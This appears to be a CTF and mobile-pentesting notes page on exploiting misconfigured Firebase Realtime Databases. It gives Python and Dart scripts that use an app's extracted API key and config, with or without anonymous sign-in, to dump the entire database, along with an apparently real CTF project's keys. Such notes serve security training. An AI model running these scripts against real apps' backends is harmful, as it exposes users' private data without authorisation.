> For the complete documentation index, see [llms.txt](https://pwnsec-notes.gitbook.io/ctf-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pwnsec-notes.gitbook.io/ctf-notes/mobile-pentesting/abusing-firebase.md).

# Abusing Firebase

Firebase provides detailed documentation and cross-platform app development SDKs, to help you build and ship apps for iOS, Android, the web, Flutter, Unity, and C++.\
The Firebase Realtime Database is a cloud-hosted database. Data is stored as JSON and synchronized in realtime to every connected client.

Some mobile applications that have firebase its Firebase is not restricted and can be accessed to its database by simple curl command

<figure><img src="/files/WySGGYIpusYBrLObXCON" alt=""><figcaption></figcaption></figure>

If the firebase is configured to depend on specific values such as:

```
    appId: "1:713169998830:android:ee341ad82ed5dd924534ff",
    apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw",
    messagingSenderId: "",
    authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com",
    databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com",
    storageBucket: "my-ctf-2e70b.appspot.com",
    projectId: "my-ctf-2e70b"
```

you can use 2 methods it depends on if it needs anonymous login or not

Without anonymous login (Python):

```python
import pyrebase

config = {
  "apiKey": "FIREBASE_API_KEY",
  "authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com",
  "databaseURL": "https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com",
  "storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com",
}

firebase = pyrebase.initialize_app(config)

db = firebase.database()

print(db.get())
```

With anonymous login (Dart):

```dart
import 'dart:convert';
import 'dart:io';
import 'dart:typed_data';

import 'package:firebase_dart/auth.dart';
import 'package:firebase_dart/core.dart';
import 'package:firebase_dart/database.dart';
import 'package:firebase_dart/implementation/pure_dart.dart';
import 'package:firebase_dart/storage.dart';

void main() async {
  FirebaseDart.setup();

  var options = FirebaseOptions(
    appId: "1:713169998830:android:ee341ad82ed5dd924534ff",
    apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw",
    messagingSenderId: "",
    authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com",
    databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com",
    storageBucket: "my-ctf-2e70b.appspot.com",
    projectId: "my-ctf-2e70b"
      );

  var app = await Firebase.initializeApp(options: options);
  var auth = FirebaseAuth.instanceFor(app: app);
  await auth.signInAnonymously();
  var database = FirebaseDatabase(app: app);
  var dbRef = database.reference();
  var snap = await dbRef.once();

  print('Flag : ${snap.value}');
}
```
